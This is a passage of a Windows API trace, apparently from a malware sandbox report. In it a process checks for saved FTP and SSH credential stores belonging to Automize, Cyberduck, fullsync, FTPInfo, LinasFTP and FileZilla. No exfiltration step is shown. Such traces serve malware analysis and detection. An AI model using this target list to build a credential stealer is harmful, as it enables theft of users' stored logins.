hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab2f8 | out: hHeap=0x690000) returned 1 [0146.880] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0146.880] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize10\\encPwd.jsd") returned 0 [0146.880] GetProcessHeap () returned 0x690000 [0146.881] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8db8 | out: hHeap=0x690000) returned 1 [0146.881] GetProcessHeap () returned 0x690000 [0146.881] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f8e) returned 0x6ab2f8 [0146.881] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0146.884] wvsprintfW (in: param_1=0x6ab2f8, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Automize10\\data\\settings\\sshProfiles-j.jsd") returned 65 [0146.884] GetProcessHeap () returned 0x690000 [0146.884] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x86) returned 0x6aa2c8 [0146.884] GetProcessHeap () returned 0x690000 [0146.884] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab2f8 | out: hHeap=0x690000) returned 1 [0146.885] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0146.886] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize10\\data\\settings\\sshProfiles-j.jsd") returned 0 [0146.886] GetProcessHeap () returned 0x690000 [0146.886] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0146.886] GetProcessHeap () returned 0x690000 [0146.886] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f8e) returned 0x6ab2f8 [0146.887] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0146.888] wvsprintfW (in: param_1=0x6ab2f8, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Automize10\\data\\settings\\ftpProfiles-j.jsd") returned 65 [0146.888] GetProcessHeap () returned 0x690000 [0146.888] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x86) returned 0x6aa2c8 [0146.888] GetProcessHeap () returned 0x690000 [0146.889] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab2f8 | out: hHeap=0x690000) returned 1 [0146.889] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0146.889] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize10\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0146.890] GetProcessHeap () returned 0x690000 [0146.890] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0146.890] GetProcessHeap () returned 0x690000 [0146.890] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f64) returned 0x6ab2f8 [0146.891] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0146.894] wvsprintfW (in: param_1=0x6ab2f8, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Automize11\\encPwd.jsd") returned 44 [0146.894] GetProcessHeap () returned 0x690000 [0146.894] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x5c) returned 0x6a8db8 [0146.894] GetProcessHeap () returned 0x690000 [0146.895] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab2f8 | out: hHeap=0x690000) returned 1 [0146.895] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0146.896] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize11\\encPwd.jsd") returned 0 [0146.896] GetProcessHeap () returned 0x690000 [0146.896] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8db8 | out: hHeap=0x690000) returned 1 [0146.897] GetProcessHeap () returned 0x690000 [0146.897] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f8e) returned 0x6ab2f8 [0146.897] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0146.898] wvsprintfW (in: param_1=0x6ab2f8, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Automize11\\data\\settings\\sshProfiles-j.jsd") returned 65 [0146.898] GetProcessHeap () returned 0x690000 [0146.898] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x86) returned 0x6aa2c8 [0146.899] GetProcessHeap () returned 0x690000 [0146.899] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab2f8 | out: hHeap=0x690000) returned 1 [0146.900] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0146.900] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize11\\data\\settings\\sshProfiles-j.jsd") returned 0 [0146.900] GetProcessHeap () returned 0x690000 [0146.900] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0146.900] GetProcessHeap () returned 0x690000 [0146.900] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f8e) returned 0x6ab2f8 [0146.901] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0146.902] wvsprintfW (in: param_1=0x6ab2f8, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Automize11\\data\\settings\\ftpProfiles-j.jsd") returned 65 [0146.902] GetProcessHeap () returned 0x690000 [0146.902] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x86) returned 0x6aa2c8 [0146.902] GetProcessHeap () returned 0x690000 [0146.902] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab2f8 | out: hHeap=0x690000) returned 1 [0146.903] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0146.904] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize11\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0146.904] GetProcessHeap () returned 0x690000 [0146.904] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0146.904] GetProcessHeap () returned 0x690000 [0146.904] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f64) returned 0x6ab2f8 [0146.905] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0146.906] wvsprintfW (in: param_1=0x6ab2f8, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Automize12\\encPwd.jsd") returned 44 [0146.907] GetProcessHeap () returned 0x690000 [0146.907] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x5c) returned 0x6a8db8 [0146.907] GetProcessHeap () returned 0x690000 [0146.907] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab2f8 | out: hHeap=0x690000) returned 1 [0146.908] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0146.908] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize12\\encPwd.jsd") returned 0 [0146.908] GetProcessHeap () returned 0x690000 [0146.909] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8db8 | out: hHeap=0x690000) returned 1 [0146.909] GetProcessHeap () returned 0x690000 [0146.909] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f8e) returned 0x6ab2f8 [0146.910] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0146.911] wvsprintfW (in: param_1=0x6ab2f8, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Automize12\\data\\settings\\sshProfiles-j.jsd") returned 65 [0146.911] GetProcessHeap () returned 0x690000 [0146.911] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x86) returned 0x6aa2c8 [0146.911] GetProcessHeap () returned 0x690000 [0146.912] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab2f8 | out: hHeap=0x690000) returned 1 [0146.913] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0146.913] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize12\\data\\settings\\sshProfiles-j.jsd") returned 0 [0146.913] GetProcessHeap () returned 0x690000 [0146.914] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0146.914] GetProcessHeap () returned 0x690000 [0146.914] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f8e) returned 0x6ab2f8 [0146.915] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0146.916] wvsprintfW (in: param_1=0x6ab2f8, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Automize12\\data\\settings\\ftpProfiles-j.jsd") returned 65 [0146.916] GetProcessHeap () returned 0x690000 [0146.916] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x86) returned 0x6aa2c8 [0146.916] GetProcessHeap () returned 0x690000 [0146.916] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab2f8 | out: hHeap=0x690000) returned 1 [0146.917] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0146.917] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize12\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0146.918] GetProcessHeap () returned 0x690000 [0146.918] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0146.918] GetProcessHeap () returned 0x690000 [0146.918] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f64) returned 0x6ab2f8 [0146.919] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0146.920] wvsprintfW (in: param_1=0x6ab2f8, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Automize13\\encPwd.jsd") returned 44 [0146.920] GetProcessHeap () returned 0x690000 [0146.920] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x5c) returned 0x6a8db8 [0146.920] GetProcessHeap () returned 0x690000 [0146.920] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab2f8 | out: hHeap=0x690000) returned 1 [0146.921] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0146.921] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize13\\encPwd.jsd") returned 0 [0146.922] GetProcessHeap () returned 0x690000 [0146.922] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8db8 | out: hHeap=0x690000) returned 1 [0146.922] GetProcessHeap () returned 0x690000 [0146.922] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f8e) returned 0x6ab2f8 [0146.923] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0146.924] wvsprintfW (in: param_1=0x6ab2f8, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Automize13\\data\\settings\\sshProfiles-j.jsd") returned 65 [0146.924] GetProcessHeap () returned 0x690000 [0146.924] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x86) returned 0x6aa2c8 [0146.924] GetProcessHeap () returned 0x690000 [0146.924] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab2f8 | out: hHeap=0x690000) returned 1 [0146.925] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0146.925] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize13\\data\\settings\\sshProfiles-j.jsd") returned 0 [0146.925] GetProcessHeap () returned 0x690000 [0146.926] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0146.926] GetProcessHeap () returned 0x690000 [0146.926] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f8e) returned 0x6ab2f8 [0146.926] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0146.927] wvsprintfW (in: param_1=0x6ab2f8, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Automize13\\data\\settings\\ftpProfiles-j.jsd") returned 65 [0146.927] GetProcessHeap () returned 0x690000 [0146.927] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x86) returned 0x6aa2c8 [0146.927] GetProcessHeap () returned 0x690000 [0146.927] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab2f8 | out: hHeap=0x690000) returned 1 [0146.928] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0146.937] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize13\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0146.938] GetProcessHeap () returned 0x690000 [0146.938] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0146.938] GetProcessHeap () returned 0x690000 [0146.938] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f64) returned 0x6ab2f8 [0146.939] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0146.940] wvsprintfW (in: param_1=0x6ab2f8, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Automize14\\encPwd.jsd") returned 44 [0146.940] GetProcessHeap () returned 0x690000 [0146.940] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x5c) returned 0x6a8db8 [0146.940] GetProcessHeap () returned 0x690000 [0146.940] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab2f8 | out: hHeap=0x690000) returned 1 [0146.942] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0146.942] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize14\\encPwd.jsd") returned 0 [0146.942] GetProcessHeap () returned 0x690000 [0146.942] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8db8 | out: hHeap=0x690000) returned 1 [0146.942] GetProcessHeap () returned 0x690000 [0146.942] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f8e) returned 0x6ab2f8 [0146.943] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0146.944] wvsprintfW (in: param_1=0x6ab2f8, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Automize14\\data\\settings\\sshProfiles-j.jsd") returned 65 [0146.944] GetProcessHeap () returned 0x690000 [0146.944] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x86) returned 0x6aa2c8 [0146.944] GetProcessHeap () returned 0x690000 [0146.944] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab2f8 | out: hHeap=0x690000) returned 1 [0146.945] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0146.945] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize14\\data\\settings\\sshProfiles-j.jsd") returned 0 [0146.945] GetProcessHeap () returned 0x690000 [0146.946] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0146.946] GetProcessHeap () returned 0x690000 [0146.946] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f8e) returned 0x6ab2f8 [0146.946] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0146.947] wvsprintfW (in: param_1=0x6ab2f8, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19fba0 | out: param_1="C:\\Program Files (x86)\\Automize14\\data\\settings\\ftpProfiles-j.jsd") returned 65 [0146.947] GetProcessHeap () returned 0x690000 [0146.947] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x86) returned 0x6aa2c8 [0146.947] GetProcessHeap () returned 0x690000 [0146.948] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab2f8 | out: hHeap=0x690000) returned 1 [0146.948] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0146.949] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize14\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0146.949] GetProcessHeap () returned 0x690000 [0146.949] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0146.950] GetProcessHeap () returned 0x690000 [0146.950] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x208) returned 0x6aa2c8 [0146.950] LoadLibraryW (lpLibFileName="SHELL32") returned 0x741b0000 [0146.951] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x6aa2c8 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0146.951] GetProcessHeap () returned 0x690000 [0146.952] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f58) returned 0x6ab2f8 [0146.952] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0146.953] wvsprintfW (in: param_1=0x6ab2f8, param_2="%s\\Cyberduck", arglist=0x19fb88 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Cyberduck") returned 47 [0146.953] GetProcessHeap () returned 0x690000 [0146.953] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x62) returned 0x6a8db8 [0146.954] GetProcessHeap () returned 0x690000 [0146.954] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab2f8 | out: hHeap=0x690000) returned 1 [0146.955] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0146.955] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Cyberduck") returned 0 [0146.955] GetProcessHeap () returned 0x690000 [0146.956] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0146.956] GetProcessHeap () returned 0x690000 [0146.956] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8db8 | out: hHeap=0x690000) returned 1 [0146.956] GetProcessHeap () returned 0x690000 [0146.956] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x208) returned 0x6aa2c8 [0146.957] LoadLibraryW (lpLibFileName="SHELL32") returned 0x741b0000 [0146.957] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x6aa2c8 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0146.958] GetProcessHeap () returned 0x690000 [0146.958] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f5e) returned 0x6ab2f8 [0146.958] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0146.959] wvsprintfW (in: param_1=0x6ab2f8, param_2="%s\\iterate_GmbH", arglist=0x19fb70 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\iterate_GmbH") returned 50 [0146.959] GetProcessHeap () returned 0x690000 [0146.959] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x68) returned 0x6a8db8 [0146.959] GetProcessHeap () returned 0x690000 [0146.960] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab2f8 | out: hHeap=0x690000) returned 1 [0146.960] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0146.960] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\iterate_GmbH") returned 0 [0146.961] GetProcessHeap () returned 0x690000 [0146.961] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0146.961] GetProcessHeap () returned 0x690000 [0146.961] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8db8 | out: hHeap=0x690000) returned 1 [0146.961] GetProcessHeap () returned 0x690000 [0146.961] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x208) returned 0x6aa2c8 [0146.962] LoadLibraryW (lpLibFileName="SHELL32") returned 0x741b0000 [0146.962] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x6aa2c8 | out: pszPath="C:\\Users\\RDhJ0CNFevzX") returned 0x0 [0146.966] GetProcessHeap () returned 0x690000 [0146.966] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f80) returned 0x6ab2f8 [0146.966] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0146.967] wvsprintfW (in: param_1=0x6ab2f8, param_2="%s\\.config\\fullsync\\profiles.xml", arglist=0x19fba0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\.config\\fullsync\\profiles.xml") returned 51 [0146.967] GetProcessHeap () returned 0x690000 [0146.967] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x6a) returned 0x6a8db8 [0146.967] GetProcessHeap () returned 0x690000 [0146.968] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab2f8 | out: hHeap=0x690000) returned 1 [0146.969] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0146.969] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\.config\\fullsync\\profiles.xml") returned 0 [0146.969] GetProcessHeap () returned 0x690000 [0146.970] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8db8 | out: hHeap=0x690000) returned 1 [0146.970] GetProcessHeap () returned 0x690000 [0146.970] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0146.970] GetProcessHeap () returned 0x690000 [0146.970] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f72) returned 0x6ab2f8 [0146.971] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0146.972] wvsprintfW (in: param_1=0x6ab2f8, param_2="%s\\FTPInfo\\ServerList.xml", arglist=0x19fba0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FTPInfo\\ServerList.xml") returned 60 [0146.972] GetProcessHeap () returned 0x690000 [0146.972] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7c) returned 0x6a8db8 [0146.972] GetProcessHeap () returned 0x690000 [0146.973] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab2f8 | out: hHeap=0x690000) returned 1 [0146.974] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0146.974] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FTPInfo\\ServerList.xml") returned 0 [0146.983] GetProcessHeap () returned 0x690000 [0146.984] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8db8 | out: hHeap=0x690000) returned 1 [0146.984] GetProcessHeap () returned 0x690000 [0146.984] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f72) returned 0x6ab2f8 [0146.985] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0146.985] wvsprintfW (in: param_1=0x6ab2f8, param_2="%s\\FTPInfo\\ServerList.cfg", arglist=0x19fb94 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FTPInfo\\ServerList.cfg") returned 60 [0146.985] GetProcessHeap () returned 0x690000 [0146.985] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7c) returned 0x6a8db8 [0146.986] GetProcessHeap () returned 0x690000 [0146.986] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab2f8 | out: hHeap=0x690000) returned 1 [0146.987] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0146.987] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FTPInfo\\ServerList.cfg") returned 0 [0146.987] GetProcessHeap () returned 0x690000 [0146.987] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8db8 | out: hHeap=0x690000) returned 1 [0146.988] GetProcessHeap () returned 0x690000 [0146.988] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e8) returned 0x6aa2c8 [0146.988] GetProcessHeap () returned 0x690000 [0146.988] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xc) returned 0x69b500 [0146.988] GetProcessHeap () returned 0x690000 [0146.988] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6a4b48 [0146.988] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0146.989] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\LinasFTP\\Site Manager", phkResult=0x6a4b48 | out: phkResult=0x6a4b48*=0x0) returned 0x2 [0146.989] GetProcessHeap () returned 0x690000 [0146.989] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4b48 | out: hHeap=0x690000) returned 1 [0146.989] GetProcessHeap () returned 0x690000 [0146.989] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0146.989] GetProcessHeap () returned 0x690000 [0146.989] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x69b500 | out: hHeap=0x690000) returned 1 [0146.989] GetProcessHeap () returned 0x690000 [0146.990] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x208) returned 0x6aa2c8 [0146.990] LoadLibraryW (lpLibFileName="SHELL32") returned 0x741b0000 [0146.991] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x6aa2c8 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0146.991] GetProcessHeap () returned 0x690000 [0146.991] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f74) returned 0x6ab2f8 [0146.991] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0146.992] wvsprintfW (in: param_1=0x6ab2f8, param_2="%s\\FileZilla\\Filezilla.xml", arglist=0x19fb9c | out: param_1="C:\\Program Files (x86)\\FileZilla\\Filezilla.xml") returned 46 [0146.992] GetProcessHeap () returned 0x690000 [0146.992] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x60) returned 0x6a8db8 [0146.992] GetProcessHeap () returned 0x690000 [0146.993] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab2f8 | out: hHeap=0x690000) returned 1 [0146.994] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0146.994] PathFileExistsW (pszPath="C:\\Program Files (x86)\\FileZilla\\Filezilla.xml") returned 0 [0146.994] GetProcessHeap () returned 0x690000 [0146.994] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8db8 | out: hHeap=0x690000) returned 1 [0146.994] GetProcessHeap () returned 0x690000 [0146.994] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aa2c8 | out: hHeap=0x690000) returned 1 [0146.996] GetProcessHeap () returned 0x690000 [0146.996] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f74) returned 0x6ab2f8 [0146.997] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0146.997] wvsprintfW (in: param_1=0x6ab2f8, param_2="%s\\FileZilla\\filezilla.xml", arglist=0x19fb90 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FileZilla\\filezilla.xml") returned 61 [0146.997] GetProcessHeap () returned 0x690000 [0146.998] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7e) returned 0x6a8db8 [0146.998] GetProcessHeap () returned 0x690000 [0146.998] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab2f8 | out: hHeap=0x690000) returned 1 [0146.998] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0146.999] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FileZilla\\filezilla.xml") returned 0 [0146.999] GetProcessHeap () returned 0x690000 [0146.999] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8db8 | out: hHeap=0x690000) returned 1 [0146.999] GetProcessHeap () returned 0x690000 [0146.999] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3f7c) returned 0x6ab2f8 [0147.000] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0147.001] wvsprintfW (in: param_1=0x6ab2f8, param_2="%s\\FileZilla\\recentservers.xml", arglist=0x19fb84 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FileZilla\\recentservers.xml") returned 65 [0147.001] GetProcessHeap () returned 0x690000 [0147.001] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x86) returned 0x6aa2c8 [0147.001] GetProcessHeap () returned 0x690000 